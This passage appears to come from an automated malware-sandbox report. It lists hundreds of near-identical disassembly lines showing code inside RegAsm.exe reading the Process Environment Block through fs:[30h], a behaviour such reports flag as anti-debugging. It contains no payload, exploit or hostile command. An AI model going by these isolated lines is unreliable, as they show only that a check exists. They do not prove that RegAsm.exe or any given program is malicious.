Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A00D mov eax, dword ptr fs:[00000030h] 1_2_0284A00D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D4000 mov ecx, dword ptr fs:[00000030h] 1_2_028D4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h] 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h] 1_2_0286E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h] 1_2_0286E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h] 1_2_0286E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h] 1_2_0286E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A020 mov eax, dword ptr fs:[00000030h] 1_2_0284A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284C020 mov eax, dword ptr fs:[00000030h] 1_2_0284C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6030 mov eax, dword ptr fs:[00000030h] 1_2_028E6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02852050 mov eax, dword ptr fs:[00000030h] 1_2_02852050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6050 mov eax, dword ptr fs:[00000030h] 1_2_028D6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287C073 mov eax, dword ptr fs:[00000030h] 1_2_0287C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02890185 mov eax, dword ptr fs:[00000030h] 1_2_02890185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F4180 mov eax, dword ptr fs:[00000030h] 1_2_028F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F4180 mov eax, dword ptr fs:[00000030h] 1_2_028F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D019F mov eax, dword ptr fs:[00000030h] 1_2_028D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D019F mov eax, dword ptr fs:[00000030h] 1_2_028D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D019F mov eax, dword ptr fs:[00000030h] 1_2_028D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D019F mov eax, dword ptr fs:[00000030h] 1_2_028D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h] 1_2_0284A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h] 1_2_0284A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h] 1_2_0284A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290C188 mov eax, dword ptr fs:[00000030h] 1_2_0290C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290C188 mov eax, dword ptr fs:[00000030h] 1_2_0290C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029161C3 mov eax, dword ptr fs:[00000030h] 1_2_029161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029161C3 mov eax, dword ptr fs:[00000030h] 1_2_029161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h] 1_2_028CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h] 1_2_028CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_028CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h] 1_2_028CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h] 1_2_028CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028801F8 mov eax, dword ptr fs:[00000030h] 1_2_028801F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029261E5 mov eax, dword ptr fs:[00000030h] 1_2_029261E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h] 1_2_028FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02910115 mov eax, dword ptr fs:[00000030h] 1_2_02910115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FA118 mov ecx, dword ptr fs:[00000030h] 1_2_028FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h] 1_2_028FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h] 1_2_028FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h] 1_2_028FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02880124 mov eax, dword ptr fs:[00000030h] 1_2_02880124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h] 1_2_028E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h] 1_2_028E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E4144 mov ecx, dword ptr fs:[00000030h] 1_2_028E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h] 1_2_028E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h] 1_2_028E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856154 mov eax, dword ptr fs:[00000030h] 1_2_02856154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856154 mov eax, dword ptr fs:[00000030h] 1_2_02856154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284C156 mov eax, dword ptr fs:[00000030h] 1_2_0284C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E8158 mov eax, dword ptr fs:[00000030h] 1_2_028E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924164 mov eax, dword ptr fs:[00000030h] 1_2_02924164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924164 mov eax, dword ptr fs:[00000030h] 1_2_02924164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854690 mov eax, dword ptr fs:[00000030h] 1_2_02854690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854690 mov eax, dword ptr fs:[00000030h] 1_2_02854690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0288C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028866B0 mov eax, dword ptr fs:[00000030h] 1_2_028866B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0288A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0288A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h] 1_2_028D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h] 1_2_028D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h] 1_2_028CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h] 1_2_028CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h] 1_2_028CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h] 1_2_028CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE609 mov eax, dword ptr fs:[00000030h] 1_2_028CE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286260B mov eax, dword ptr fs:[00000030h] 1_2_0286260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892619 mov eax, dword ptr fs:[00000030h] 1_2_02892619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E627 mov eax, dword ptr fs:[00000030h] 1_2_0286E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02886620 mov eax, dword ptr fs:[00000030h] 1_2_02886620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02888620 mov eax, dword ptr fs:[00000030h] 1_2_02888620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285262C mov eax, dword ptr fs:[00000030h] 1_2_0285262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286C640 mov eax, dword ptr fs:[00000030h] 1_2_0286C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h] 1_2_0288A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h] 1_2_0288A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02882674 mov eax, dword ptr fs:[00000030h] 1_2_02882674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291866E mov eax, dword ptr fs:[00000030h] 1_2_0291866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291866E mov eax, dword ptr fs:[00000030h] 1_2_0291866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F678E mov eax, dword ptr fs:[00000030h] 1_2_028F678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028507AF mov eax, dword ptr fs:[00000030h] 1_2_028507AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029047A0 mov eax, dword ptr fs:[00000030h] 1_2_029047A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0285C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D07C3 mov eax, dword ptr fs:[00000030h] 1_2_028D07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028727ED mov eax, dword ptr fs:[00000030h] 1_2_028727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028727ED mov eax, dword ptr fs:[00000030h] 1_2_028727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028727ED mov eax, dword ptr fs:[00000030h] 1_2_028727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DE7E1 mov eax, dword ptr fs:[00000030h] 1_2_028DE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028547FB mov eax, dword ptr fs:[00000030h] 1_2_028547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028547FB mov eax, dword ptr fs:[00000030h] 1_2_028547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C700 mov eax, dword ptr fs:[00000030h] 1_2_0288C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850710 mov eax, dword ptr fs:[00000030h] 1_2_02850710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02880710 mov eax, dword ptr fs:[00000030h] 1_2_02880710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h] 1_2_0288C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h] 1_2_0288C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288273C mov eax, dword ptr fs:[00000030h] 1_2_0288273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288273C mov ecx, dword ptr fs:[00000030h] 1_2_0288273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288273C mov eax, dword ptr fs:[00000030h] 1_2_0288273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CC730 mov eax, dword ptr fs:[00000030h] 1_2_028CC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288674D mov esi, dword ptr fs:[00000030h] 1_2_0288674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288674D mov eax, dword ptr fs:[00000030h] 1_2_0288674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288674D mov eax, dword ptr fs:[00000030h] 1_2_0288674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DE75D mov eax, dword ptr fs:[00000030h] 1_2_028DE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850750 mov eax, dword ptr fs:[00000030h] 1_2_02850750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D4755 mov eax, dword ptr fs:[00000030h] 1_2_028D4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892750 mov eax, dword ptr fs:[00000030h] 1_2_02892750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892750 mov eax, dword ptr fs:[00000030h] 1_2_02892750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858770 mov eax, dword ptr fs:[00000030h] 1_2_02858770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 mov eax, dword ptr fs:[00000030h] 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290A49A mov eax, dword ptr fs:[00000030h] 1_2_0290A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028564AB mov eax, dword ptr fs:[00000030h] 1_2_028564AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028844B0 mov ecx, dword ptr fs:[00000030h] 1_2_028844B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DA4B0 mov eax, dword ptr fs:[00000030h] 1_2_028DA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028504E5 mov ecx, dword ptr fs:[00000030h] 1_2_028504E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02888402 mov eax, dword ptr fs:[00000030h] 1_2_02888402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02888402 mov eax, dword ptr fs:[00000030h] 1_2_02888402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02888402 mov eax, dword ptr fs:[00000030h] 1_2_02888402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284C427 mov eax, dword ptr fs:[00000030h] 1_2_0284C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h] 1_2_0284E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h] 1_2_0284E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h] 1_2_0284E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h] 1_2_028D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290A456 mov eax, dword ptr fs:[00000030h] 1_2_0290A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h] 1_2_0288E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284645D mov eax, dword ptr fs:[00000030h] 1_2_0284645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287245A mov eax, dword ptr fs:[00000030h] 1_2_0287245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DC460 mov ecx, dword ptr fs:[00000030h] 1_2_028DC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h] 1_2_0287A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h] 1_2_0287A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h] 1_2_0287A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02884588 mov eax, dword ptr fs:[00000030h] 1_2_02884588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02852582 mov eax, dword ptr fs:[00000030h] 1_2_02852582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02852582 mov ecx, dword ptr fs:[00000030h] 1_2_02852582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E59C mov eax, dword ptr fs:[00000030h] 1_2_0288E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h] 1_2_028D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h] 1_2_028D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h] 1_2_028D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h] 1_2_028745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h] 1_2_028745B1
